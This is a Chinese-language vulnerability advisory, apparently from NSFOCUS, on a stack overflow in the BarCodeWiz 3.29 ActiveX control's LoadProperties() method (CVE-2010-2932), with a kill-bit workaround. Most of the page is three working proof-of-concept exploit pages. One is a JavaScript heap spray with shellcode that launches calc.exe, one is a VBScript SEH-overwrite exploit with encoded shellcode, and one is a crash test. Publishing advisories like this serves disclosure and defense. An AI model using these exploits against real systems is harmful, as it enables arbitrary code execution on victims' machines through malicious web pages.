安全研究
安全漏洞
BarCodeWiz Barcode控件LoadProperties()方式栈溢出漏洞
发布日期:2010-08-02
更新日期:2010-08-04
受影响系统:
GetMySystem BarCodeWiz 3.29描述:
BUGTRAQ ID: 42097
CVE(CAN) ID: CVE-2010-2932
BarCodeWiz Barcode ActiveX控件是一款条码打印控件。
BarcodeWiz.dll没有正确地处理传送给LoadProperties()方式的参数,用户受骗访问了恶意网页并向该方式传送了超长字符串参数就可以触发栈溢出,导致执行任意代码。
<*来源:loneferret
链接:http://secunia.com/advisories/40786/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='javascript'>
// Payload is win32_exec - calc.exe
shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize = 69; //size adjusted for IE6/IE7 "universality"
slackspace= headersize + shellcode.length;
while(nops.length<slackspace) nops+=nops;
fillblock=nops.substring(0,slackspace);
block=nops.substring(0,nops.length-slackspace);
while(block.length+slackspace<0x40000) block=block+block+fillblock;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= block + shellcode;
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");
target.LoadProperties(ret);
</script>
</html>
<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>
buffer = String(97,"A")
jmp = unescape("%eb%06%41%41")
SEH = unescape("%4b%f4%02%10")
shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")
buffer2 = String(1552, "C")
arg1 = buffer + jmp + SEH + shellcode + buffer2
target.LoadProperties arg1
</script>
Barcodewiz 3.29
</html>
<html>
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='target'></object>
<script language='vbscript'>
buffer = String(101,"A")
SEH = String(4, "B")
buffer2 = String(1895, "C")
arg1 = buffer + SEH + buffer2
target.LoadProperties arg1
</script>
Barcodewiz 3.29
</html>
建议:
临时解决方法:
* 为clsid CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6设置kill bit。
厂商补丁:
GetMySystem
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.taltech.com/products/activex_barcodes.html
浏览次数:2426
严重程度:0(网友投票)
绿盟科技给您安全的保障